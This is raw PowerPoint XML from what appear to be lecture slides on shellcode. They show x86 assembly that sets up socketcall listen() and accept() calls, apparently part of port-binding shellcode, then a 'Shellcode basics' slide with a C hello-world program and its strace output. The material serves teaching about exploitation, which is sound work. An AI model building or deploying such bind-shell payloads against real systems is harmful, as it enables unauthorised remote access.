                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 4 = SYS_LISTEN = listen()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: { backlog = 4,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ;         socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = argument array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; c = accept(s, 0, 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> BYTE al, 0x66 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socketcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #102)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 5 = SYS_ACCEPT = accept()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socklen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ;         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = NULL,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ;         socket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = argument array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = connected socket FD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45359246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228600" y="434975"/>
            <a:ext cx="6845300" cy="555625"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> basics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1143000"/>
            <a:ext cx="1622425" cy="363538"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149508" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="3883025" cy="1751762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F6F5BD"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“Hello world!\n”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149509" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="1111250"/>
            <a:ext cx="4114800"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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" defTabSz="895350">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149510" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="1592263"/>
            <a:ext cx="4195763" cy="4275529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F6F5BD"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("./hello", ["./hello"], [/* 24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> */]) = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>({sys="Linux", node="klaki.net", ...}) = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
